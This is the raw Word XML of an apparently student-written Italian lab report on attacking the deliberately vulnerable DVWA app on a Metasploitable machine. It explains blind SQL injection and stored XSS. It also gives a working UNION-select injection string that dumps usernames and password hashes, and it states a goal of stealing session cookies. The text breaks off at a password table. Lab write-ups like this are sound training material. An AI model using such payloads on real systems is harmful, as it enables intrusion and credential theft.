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F620" w14:textId="77777777" w:rsidR="00E80B24" w:rsidRPr="00F05C0C" w:rsidRDefault="00E80B24" w:rsidP="00E80B24">
      <w:pPr>
        <w:jc w:val="cente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5C0C">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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7891C287" w14:textId="36C2B738" w:rsidR="007C21D0" w:rsidRPr="00F05C0C" w:rsidRDefault="00E80B24" w:rsidP="00E80B24">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accen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05C0C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accen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 Application Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA2685" w14:textId="09CD1199" w:rsidR="00B45D4C" w:rsidRDefault="00B45D4C" w:rsidP="00B45D4C">
      <w:pP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FCA8C70" w14:textId="77777777" w:rsidR="00575A77" w:rsidRDefault="00A51D31" w:rsidP="00575A77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All’interno di questo repo</w:t>
      </w:r>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rt, andremo ad </w:t>
      </w:r>
      <w:r w:rsidR="007F70F8" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analizzare l’exploit del</w:t>
      </w:r>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">le vulnerabilità della macchina target </w:t>
      </w:r>
      <w:r w:rsidR="007F70F8" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, in particolare dell’applicazione Web DVWA</w:t>
      </w:r>
      <w:r w:rsidR="0024293D" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F05C0C" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Application)</w:t>
      </w:r>
      <w:r w:rsidR="0024293D" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00575A77" w:rsidRPr="00575A77">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C693BFD" w14:textId="3D9387B9" w:rsidR="00575A77" w:rsidRPr="00B34E8B" w:rsidRDefault="00575A77" w:rsidP="00575A77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gli scopi di questo attacco sono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F5C56" w14:textId="77777777" w:rsidR="00575A77" w:rsidRPr="00B34E8B" w:rsidRDefault="00575A77" w:rsidP="00575A77">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recuperare le password attraverso l’SQL injection (blind);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA8EF1" w14:textId="7A4039CF" w:rsidR="007F70F8" w:rsidRPr="001B66D1" w:rsidRDefault="00575A77" w:rsidP="00E80B24">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recuperare i cookie di sessione per ogni utente trovato e inviarli ad un web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27105026" w14:textId="3E420DB9" w:rsidR="0024293D" w:rsidRPr="00B34E8B" w:rsidRDefault="00F56199" w:rsidP="00E80B24">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In particolare, le vulnerabilità prese in esame in questo caso sono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F63A1" w14:textId="77672BB2" w:rsidR="00F56199" w:rsidRPr="00B34E8B" w:rsidRDefault="00F56199" w:rsidP="00F56199">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="001B20B4" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>njection (blind);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071539C4" w14:textId="2145D118" w:rsidR="00F56199" w:rsidRPr="00B34E8B" w:rsidRDefault="00F56199" w:rsidP="00F56199">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73493C" w14:textId="718F171B" w:rsidR="00F56199" w:rsidRPr="00B34E8B" w:rsidRDefault="001B20B4" w:rsidP="00F56199">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Per </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL Injection (blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) intendiamo </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>una tecnica che prevede l'invio di una query</w:t>
      </w:r>
      <w:r w:rsidR="001B66D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dinamica</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a tempo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">al </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>database per valutarne il risultato. La query in</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>viata</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> forzerà il database ad a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">spettare </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">prima di </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">re un risultato, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VERO o FALSO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6AA5A9" w14:textId="562ACA3F" w:rsidR="002D1EF5" w:rsidRPr="00B34E8B" w:rsidRDefault="002D1EF5" w:rsidP="00F56199">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L’</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, invece, </w:t>
      </w:r>
      <w:r w:rsidR="0063037D" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>viene utilizzato per immagazzinare permanentemente</w:t>
      </w:r>
      <w:r w:rsidR="0063037D" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> un input dannoso su un server </w:t>
      </w:r>
      <w:r w:rsidR="004B4A98">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>che verrà rinviato</w:t>
      </w:r>
      <w:r w:rsidR="0063037D" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> all'utente in un'applicazione Web vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB24E6" w14:textId="0078AFDF" w:rsidR="0063037D" w:rsidRPr="00B34E8B" w:rsidRDefault="0063037D" w:rsidP="00F56199">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Questo tipo di XSS è</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> più grave del </w:t>
      </w:r>
      <w:r w:rsidR="004B4A98">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS riflesso</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> perché i dati inseriti all’interno dell’input vengono inviati al server e salvati all’interno del database</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Una volta riaperta la pagina,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> il server risponderà con gli stessi dati, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rigenerando di nuovo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E57FA5" w14:textId="414D87E2" w:rsidR="00586571" w:rsidRPr="00B34E8B" w:rsidRDefault="00586571" w:rsidP="0058657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62BA66" w14:textId="0494D122" w:rsidR="00A955DA" w:rsidRPr="00B57F20" w:rsidRDefault="00A955DA" w:rsidP="00A955DA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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7F2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SQL Injection (blind) – </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57F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recupero</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57F2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delle password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C27B694" w14:textId="5DDC80EA" w:rsidR="00A955DA" w:rsidRPr="00B34E8B" w:rsidRDefault="008544A5" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Per quanto riguarda questo primo punto, la prima cosa da fare è collegarsi al sito della DVWA con indirizzo 192.168.50.100 (</w:t>
      </w:r>
      <w:r w:rsidR="00D509B0" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP target della macchina Metasploitable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D509B0" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e accedere con le credenziali </w:t>
      </w:r>
      <w:r w:rsidR="00C66F69">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D509B0" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00C66F69">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e</w:t>
      </w:r>
      <w:r w:rsidR="00D509B0" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C66F69">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D509B0" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00C66F69">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D509B0" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020E274A" w14:textId="4D4D4E1A" w:rsidR="00D509B0" w:rsidRPr="00B34E8B" w:rsidRDefault="00D509B0" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Una volta fatto ciò, bisogna spostarsi sulla tab DVWA Security e settare la sicurezza a Low. Dopodiché, il passo successivo da fare è spostarsi sulla tab della SQL Injection (blind).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA22A0" w14:textId="03AA07CF" w:rsidR="00D509B0" w:rsidRPr="00B34E8B" w:rsidRDefault="00D509B0" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nella casella di testo “user ID” andremo ad inserire il comando utilizzato per stampare in output sulla pagina le varie informazioni, tra cui anche tutte le password cifrate di tutti gli utenti presenti all’interno del database della DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142173F5" w14:textId="77777777" w:rsidR="0010442D" w:rsidRDefault="00D509B0" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Il comando utilizzato è:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24486F23" w14:textId="40A1A41B" w:rsidR="00D509B0" w:rsidRPr="0010442D" w:rsidRDefault="00D509B0" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> %’ and 1=0 union </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010442D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(user,0x0a,password) from users #.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEBC5B" w14:textId="3DFBA4F4" w:rsidR="00D509B0" w:rsidRPr="00B34E8B" w:rsidRDefault="00D509B0" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Questo comando ci restituisce le informazioni circa il nom</w:t>
      </w:r>
      <w:r w:rsidR="0099119F" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r w:rsidR="0099119F" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">gli </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="0099119F" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s degli utenti e le password cifrate in chiave </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0099119F" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0099119F" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3F616" w14:textId="11AC3B12" w:rsidR="006C15DF" w:rsidRPr="00B34E8B" w:rsidRDefault="006C15DF" w:rsidP="008544A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Di seguito possiamo vedere il comando citato sopra attuato sulla macchina DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CFA87" w14:textId="2A8FC277" w:rsidR="00334928" w:rsidRPr="00B34E8B" w:rsidRDefault="00B45D4C" w:rsidP="003E728E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="148E6AD0" wp14:editId="47F0ED99">
            <wp:extent cx="6120130" cy="41198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4119880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74557704" w14:textId="5D7B7CEB" w:rsidR="00802C4B" w:rsidRPr="00B34E8B" w:rsidRDefault="00802C4B" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Le password trovate sono:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
